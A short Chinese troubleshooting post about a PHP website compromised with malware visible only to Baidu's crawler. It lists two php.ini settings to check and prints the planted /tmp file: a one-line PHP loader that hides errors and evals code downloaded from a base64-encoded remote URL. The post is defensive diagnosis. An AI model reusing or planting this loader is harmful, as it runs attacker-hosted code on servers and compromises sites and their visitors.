PHP网站全部被挂马,而且只有百度爬虫才能看到恶意代码

解决办法:  

1.查看auto_prepend_file:auto_prepend_file =   这里必须是空,如果引用文件,说明这个文件有问题

2. 查看allow_url_include:allow_url_include = Off 状态必须是Off

我的是在根目录/tmp/下面加了mysqlsock的文件,内容如下:
<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovL2pqc3MubXJ0MzEuY29tL3gvd3dqc2Njcy50eHQ=')));?>
代码结束,下面是正确php.ini正常设置




发表评论 已发布 0

还可以输入 800 个字
 
 
打印